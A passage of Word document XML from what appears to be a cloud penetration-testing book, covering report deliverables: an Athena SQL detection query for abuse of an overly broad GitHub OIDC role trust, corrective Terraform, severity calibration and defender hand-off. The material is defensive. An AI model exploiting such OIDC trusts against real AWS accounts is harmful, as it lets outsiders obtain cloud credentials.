    <w:p w14:paraId="7E0CF839" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --output json &gt; engagement-cloudtrail.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BA681" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1723359615"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> jq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'.[] | {t:.[0], name:.[1], id:.[2]}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> engagement-cloudtrail.json | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F902F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.4  Detection engineering deliverables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B3570"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For each finding the client can act on, the report should include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>detection hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: a query or rule that the client's SOC can deploy in their SIEM to alert on future exploitation of the same primitive. The format depends on the client's tools: Athena SQL for organizations that pipe CloudTrail to S3 and query with Athena; Splunk SPL for Splunk shops; Sigma rules for organizations with broad multi-SIEM deployments; GuardDuty custom threat list entries for IP-based indicators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491DE5C6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-- detection hint: overly-broad OIDC trust exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04BFD6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-- Athena SQL over CloudTrail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20404598" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eventtime, useridentity.arn, sourceipaddress,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA8B52" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">       requestparameters.roleArn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7F9DFB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">   cloudtrail_logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC942D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  eventname = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'AssumeRoleWithWebIdentity'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D7510" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    requestparameters.principalTag.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"aws:RequestTag/repo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>NOT LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'MyOrg/%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0C42C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1559587884"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    eventtime &gt; current_date - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>interval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'7'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> day;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA2B242" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.5  Remediation as Terraform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D8BD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Remediation guidance that a client can copy-paste is more valuable than guidance expressed in prose. For each finding, the report should include the minimum remediation code. For an IAM-policy finding this is the corrected policy JSON; for a resource-level finding this is the Terraform or CloudFormation diff that applies it. Providing this code does not obviate the client's own review; it accelerates it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B3064" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># remediation: tighten OIDC trust for role/github-deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C5261" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">resource </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"aws_iam_role"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"github_deploy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D013C36" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  name = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"github-deploy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FCFD0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  assume_role_policy = jsonencode({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384437D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    Version = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2012-10-17"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E05F4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    Statement = [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED71890" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      Effect = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Allow"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD62B9E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      Principal = { Federated = aws_iam_openid_connect_provider.github.arn }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F544E66" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      Action = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"sts:AssumeRoleWithWebIdentity"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20507E97" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      Condition = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B153109" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        StringEquals = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706F95E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"token.actions.githubusercontent.com:aud"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"sts.amazonaws.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31994F7C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"token.actions.githubusercontent.com:sub"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"repo:MyOrg/MyRepo:ref:refs/heads/main"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B14B2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5E9E6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AF25A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    }]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E001959" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D93D15" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1821727496"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0908A0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.6  Severity calibration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9CAC3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 common pathology of penetration test reports is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>severity inflation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: every finding is high or critical. Severity discipline matters because it is how the client triages. A consistent model, applied across the report, is better than a high-contrast model that marks everything important as critical. The authors' practice is to reserve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for findings that are exploitable by an external attacker with no prerequisites and produce admin-level access; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for findings that are exploitable by an external attacker but require some prerequisite; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for findings that are exploitable only by a compromised insider; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for configuration hygiene that is not directly exploitable. A report with a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a dozen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">s reads as more trustworthy than one with seven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Criticals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B881F8F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.7  Defender hand-off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F9FC5"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engagement ideally closes with a live debrief to the defender's team: walk through the narrative, answer questions, validate that the detections the client intends to build will in fact catch the attack next time. A 90-minute session with the SOC lead, the cloud platform team, and the IAM owner produces more residual value than any written document. Budget for it in the statement of work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1114EB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C58BB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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The attack narrative is the report section that justifies the engagement's budget; omit nothing else before omitting it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C4E436" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Each finding should include title, severity, affected ARNs, prerequisites, exploitation steps with CloudTrail evidence, observed impact, and implementable remediation code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0973C323" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Detection-engineering deliverables (Athena SQL, Splunk SPL, Sigma rules) turn findings into durable improvements for the client's SOC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3911CF30" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Remediation-as-Terraform accelerates adoption; prose remediation is inferior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B462420" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Severity discipline matters more than severity distribution; a report with one Critical finding is more actionable than one with seven.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4C899" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
